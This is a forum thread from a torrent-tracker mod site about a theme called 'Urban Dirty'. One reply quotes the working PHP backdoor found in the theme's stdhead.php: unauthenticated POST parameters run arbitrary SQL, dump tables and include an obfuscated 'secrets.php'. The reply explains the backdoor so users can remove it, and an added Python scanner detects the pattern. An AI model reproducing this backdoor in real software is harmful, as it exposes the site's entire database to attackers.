Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Mods & Themes (http://www.bvlist.com/forumdisplay.php?f=109)
-   -   Urban Dirty (http://www.bvlist.com/showthread.php?t=4301)

sammygo 22nd January 2010 10:27

Urban Dirty
 
2 Attachment(s)

ATTENTION: stdhead.php file might contain some BACKDOOR

http://img294.imageshack.us/img294/1...oadprevmy8.jpg http://img514.imageshack.us/img514/515/55843982ru9.jpg
http://i49.tinypic.com/2mc7q1c.png http://img514.imageshack.us/img514/6453/41199384cg4.jpg

tlogic 21st March 2010 14:45


The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo of that, because he might have gotten the file from another source.

In any case, the backdoor is in the file include/stdhead.php at lines 260-299.

These are the offending lines:
PHP Code:

// request parameters are read straight from POST: no authentication, no validation
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];

...

// h_cmd: run an arbitrary SQL statement as the tracker's database user
if($h_cmd) {
    set_time_limit(0);
    mysql_query($h_cmd) or die(mysql_error());
}
// h_display: describe every table (of $mysql_db, or of the database named in POST 'db')
if($h_display) {
    set_time_limit(0);
    // the chr() chain builds the string "secrets.php", which is then included
    $h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
    include $h_addr;
    echo "";
    if($mysql_db) $h_tables=mysql_list_tables($mysql_db);
    else $h_tables=mysql_list_tables($_POST['db']);
    while(list($h_table)=mysql_fetch_row($h_tables)) {
        echo "<b>$h_table</b>";
        $h_res=mysql_query("describe $h_table") or die(mysql_error());
        echo "<table><tr><td>Field</td><td>Type</td><td>NULL</td><td>Key</td><td>Default</td><td>Extra</td></tr>";
        while($h_desc=mysql_fetch_array($h_res))
            echo "<tr><td>$h_desc[0]</td><td>$h_desc[1]</td><td>$h_desc[2]</td><td>$h_desc[3]</td><td>$h_desc[4]</td></tr>";
        echo "</table>";
    }
}
// h_table: dump every row of the named table (the table name is interpolated unescaped)
if($h_table) {
    set_time_limit(0);
    $x=1;
    $h_res=mysql_query("select*from $h_table") or die(mysql_error());
    $i=mysql_num_fields($h_res);
    echo "<table>";
    while($h_value=mysql_fetch_row($h_res)) {
        echo "<tr><td><b>".$x++."</b></td>";
        for($j=0;$j<=$i;$j++)
            echo "<td>".$h_value[$j]."</td>";
        echo "</tr>";
    }
    echo "</table>";
}


So what this code basically does:

The "h_cmd" POST variable executes any SQL command on the server.

The "h_display" POST variable displays a list of all the tables in the database.
The attacker also has the ability to select another database by supplying the POST variable "db".

The "h_table" POST variable prints all the data contained in the table specified by "h_table".

Also the variable $h_addr contains the string secrets.php and is used to include that file.

So, to be safe, delete all the above lines from stdhead.php.
I haven't thoroughly reviewed the whole code so there might be more backdoors in the other files.

So beware before using that code!
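
A scanner for the pattern tlogic describes, added here as an example; it is not code from this thread, from the theme, or from TBDev. It is written in Python rather than PHP so it can be run over an unpacked theme archive before the files go anywhere near a live tracker. It does three things: decodes chr() concatenation chains and reports what they spell (so the hidden "secrets.php" becomes visible), tracks which variables were assigned from $_POST/$_GET/$_REQUEST/$_COOKIE, and flags lines where such input reaches mysql_query, include, eval and similar sinks. The sample input is the offending fragment quoted above, constructed inline; the names scan_php, decode_chr_chain, SAMPLE_PHP and the sink list are this example's own assumptions.

```python
import re

# Constructed sample input: the offending fragment of include/stdhead.php as
# quoted in the post above, trimmed to the lines that matter for the scan.
SAMPLE_PHP = r'''$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];
if($h_cmd) {
    set_time_limit(0);
    mysql_query($h_cmd) or die(mysql_error());
}
if($h_display) {
    $h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
    include $h_addr;
    if($mysql_db) $h_tables=mysql_list_tables($mysql_db);
    else $h_tables=mysql_list_tables($_POST['db']);
}
if($h_table) {
    $h_res=mysql_query("select*from $h_table") or die(mysql_error());
}'''

# Request superglobals are the taint sources.
SUPERGLOBAL = r'\$_(?:POST|GET|REQUEST|COOKIE)'
# Functions/constructs that must never receive raw request input. This list is
# an assumption made for the example; extend it for your own code base.
SINK_NAMES = ('mysql_query', 'mysqli_query', 'mysql_list_tables', 'mysql_select_db',
              'include', 'include_once', 'require', 'require_once',
              'eval', 'system', 'exec', 'shell_exec', 'passthru', 'popen')
INCLUDE_SINKS = {'include', 'include_once', 'require', 'require_once'}

SINK_CALL = re.compile(r'\b(' + '|'.join(SINK_NAMES) + r')\b\s*\(?\s*([^;]*)')
ASSIGN = re.compile(r'\$(\w+)\s*=(?!=)\s*([^;]+);')
# A concatenation of two or more string pieces, where a piece is chr(N) or a
# quoted literal; this is how the backdoor hides the name "secrets.php".
PIECE = r'chr\(\s*\d+\s*\)|"[^"]*"|\'[^\']*\''
CHR_CHAIN = re.compile(r'(?:' + PIECE + r')(?:\s*\.\s*(?:' + PIECE + r'))+')


def decode_chr_chain(expr: str) -> str:
    """Evaluate a chr()/literal concatenation chain into the string it builds."""
    out = []
    for tok in re.finditer(PIECE, expr):
        text = tok.group(0)
        if text.startswith('chr'):
            out.append(chr(int(re.search(r'\d+', text).group(0))))
        else:
            out.append(text[1:-1])  # strip the surrounding quotes
    return ''.join(out)


def scan_php(source: str):
    """Return (line_no, kind, detail) findings for one PHP source string.

    This is a line-oriented regex heuristic, not a PHP parser: taint is only
    followed through plain `$var = ...;` assignments, so it misses flows through
    arrays, functions or multi-line statements, and it over-reports input that
    was validated earlier. It is meant for triage, not as proof of absence.
    """
    tainted = set()
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        # 1. Strings assembled from chr() calls: decode and report what they spell.
        for m in CHR_CHAIN.finditer(line):
            if 'chr(' in m.group(0):
                findings.append((lineno, 'obfuscated-string', decode_chr_chain(m.group(0))))
        # 2. Request input (directly, or via a tainted variable) reaching a sink.
        for m in SINK_CALL.finditer(line):
            sink, args = m.group(1), m.group(2)
            sources = re.findall(SUPERGLOBAL + r'\[[^\]]*\]', args)
            sources += ['$' + v for v in sorted(tainted)
                        if re.search(r'\$' + re.escape(v) + r'\b', args)]
            if sources:
                findings.append((lineno, 'request-to-sink', f'{sink} <- {", ".join(sources)}'))
            elif sink in INCLUDE_SINKS and '$' in args:
                # include of a computed path: not request-controlled here, but
                # worth a look (in the backdoor it is the decoded secrets.php)
                findings.append((lineno, 'dynamic-include', f'{sink} {args.strip()}'))
        # 3. Propagate taint through simple assignments for the lines that follow.
        for m in ASSIGN.finditer(line):
            var, rhs = m.group(1), m.group(2)
            if re.search(SUPERGLOBAL, rhs) or any(
                    re.search(r'\$' + re.escape(v) + r'\b', rhs) for v in tainted):
                tainted.add(var)
    return findings


if __name__ == '__main__':
    for lineno, kind, detail in scan_php(SAMPLE_PHP):
        print(f'line {lineno:3d}  {kind:18s} {detail}')
```

Run against the sample it reports the SQL sink on h_cmd, the decoded "secrets.php", the dynamic include of that name, the POST-controlled database name passed to mysql_list_tables, and the unescaped table name in the select. To sweep a whole theme, feed each .php file's contents to scan_php and review every hit by hand; a clean run does not prove the archive is clean, it only means nothing matched these particular patterns.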

antec9000 23rd March 2010 21:24

Nice theme !
 
This must be one of the nicest themes I've ever seen for tbdev, but because I suck at coding I can't figure out how to make the theme work.

So I would be very happy if someone could help me :drink:

redesmania 23rd March 2010 21:55

help
 
the scripts need to be able to flash the coluca Work!

PHP Code:

<script type="text/javascript" src="script/swfobject.js"></script>


movizdb 9th June 2010 00:16

Beware!
 
Thanks a lot. By the way, can you port this to xbtit please?

aqila 16th October 2010 12:57

Thanks.

aaaaaa 20th October 2010 19:30

TUTORIAL :)
 
Yes please, a tutorial on how to install, please.

CAGADA 9th January 2011 13:23

How to install? Please.

superize 12th January 2011 02:51

How to install theme ?

sammygo 14th January 2011 10:38

I think the best way to install this theme is:

1. Download Filelist v2.0 and install it.
2. Replace the theme files in the source.

It will work :drink:


All times are GMT +2.